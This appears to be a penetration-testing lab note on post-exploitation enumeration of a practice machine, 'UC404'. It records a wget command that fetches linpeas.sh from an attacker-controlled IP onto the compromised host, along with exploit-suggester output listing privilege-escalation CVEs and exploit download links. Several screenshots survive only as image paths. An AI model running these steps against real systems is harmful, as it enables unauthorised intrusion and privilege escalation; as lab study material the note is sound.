PEAS
Conducting an automated enumeration after performing a manual enumeration
www-data@UC404:/var/tmp$ wget -q http://192.168.45.163/linpeas.sh ; chmod 755 ./linpeas.shDelivery complete
/Practice/UC404/4-Post_Enumeration/attachments/{2E859459-96D7-42A1-9517-E1C82CE81EB8}.png)
Executing PEAS
Unmounted file-system
/Practice/UC404/4-Post_Enumeration/attachments/{4833E451-94E2-4422-A73A-13F98B2EE21B}.png)
www-data@UC404:/var$ ll /media/cdrom0
total 8.0K
4.0K drwxr-xr-x 2 root root 4.0K Oct 20 2020 .
4.0K drwxr-xr-x 3 root root 4.0K Oct 20 2020 ..CVEs
╔══════════╣ Executing Linux Exploit Suggester
╚ https://github.com/mzet-/linux-exploit-suggester
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
cat: write error: Broken pipe
[+] [CVE-2019-13272] PTRACE_TRACEME
Details: https://bugs.chromium.org/p/project-zero/issues/detail?id=1903
Exposure: highly probable
Tags: ubuntu=16.04{kernel:4.15.0-*},ubuntu=18.04{kernel:4.15.0-*},debian=9{kernel:4.9.0-*},[ debian=10{kernel:4.19.0-*} ],fedora=30{kernel:5.0.9-*}
Download URL: https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/47133.zip
ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2019-13272/poc.c
Comments: Requires an active PolKit agent.
[+] [CVE-2021-3156] sudo Baron Samedit
Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
Exposure: less probable
Tags: mint=19,ubuntu=18|20, debian=10
Download URL: https://codeload.github.com/blasty/CVE-2021-3156/zip/main
[+] [CVE-2021-3156] sudo Baron Samedit 2
Details: https://www.qualys.com/2021/01/26/cve-2021-3156/baron-samedit-heap-based-overflow-sudo.txt
Exposure: less probable
Tags: centos=6|7|8,ubuntu=14|16|17|18|19|20, debian=9|10
Download URL: https://codeload.github.com/worawit/CVE-2021-3156/zip/main
[+] [CVE-2021-22555] Netfilter heap out-of-bounds write
Details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
Exposure: less probable
Tags: ubuntu=20.04{kernel:5.8.0-*}
Download URL: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c
ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c
Comments: ip_tables kernel module must be loaded
[+] [CVE-2019-18634] sudo pwfeedback
Details: https://dylankatz.com/Analysis-of-CVE-2019-18634/
Exposure: less probable
Tags: mint=19
Download URL: https://github.com/saleemrashid/sudo-cve-2019-18634/raw/master/exploit.c
Comments: sudo configuration requires pwfeedback to be enabled.Services
/Practice/UC404/4-Post_Enumeration/attachments/{663AC7A8-708F-4E23-9A01-4A0A9FF9FA69}.png)
Installed Programs
/Practice/UC404/4-Post_Enumeration/attachments/{9639CFD7-D87E-4256-A94A-00643467AD96}.png)
NFS
/Practice/UC404/4-Post_Enumeration/attachments/{DE2F932B-1089-4FF5-942D-B5B76623FF7A}.png)
www-data@UC404:/var/tmp$ cat /etc/exports
# /etc/exports: the access control list for filesystems which may be exported
# to NFS clients. See exports(5).
#
# Example for NFSv2 and NFSv3:
# /srv/homes hostname1(rw,sync,no_subtree_check) hostname2(ro,sync,no_subtree_check)
#
# Example for NFSv4:
# /srv/nfs4 gss/krb5i(rw,sync,fsid=0,crossmnt,no_subtree_check)
# /srv/nfs4/homes gss/krb5i(rw,sync,no_subtree_check)
#SSH
/Practice/UC404/4-Post_Enumeration/attachments/{09E6C97C-E724-4EAF-800C-A488F88926AE}.png)
/Practice/UC404/4-Post_Enumeration/attachments/{301A6D81-A103-4F81-A398-2FEFDAEC61FE}.png)
Interesting Files
/Practice/UC404/4-Post_Enumeration/attachments/{44446E3E-6902-4FA4-A875-7A2A891C733E}.png)
/var/log/squid/access.log
/Practice/UC404/4-Post_Enumeration/attachments/{22FF2D58-B124-4ED6-96F6-261893C0719A}.png)
/var/backups/sendmail.php.bak
/Practice/UC404/4-Post_Enumeration/attachments/{DB2E05F0-073F-4419-8D84-2083A959D503}.png)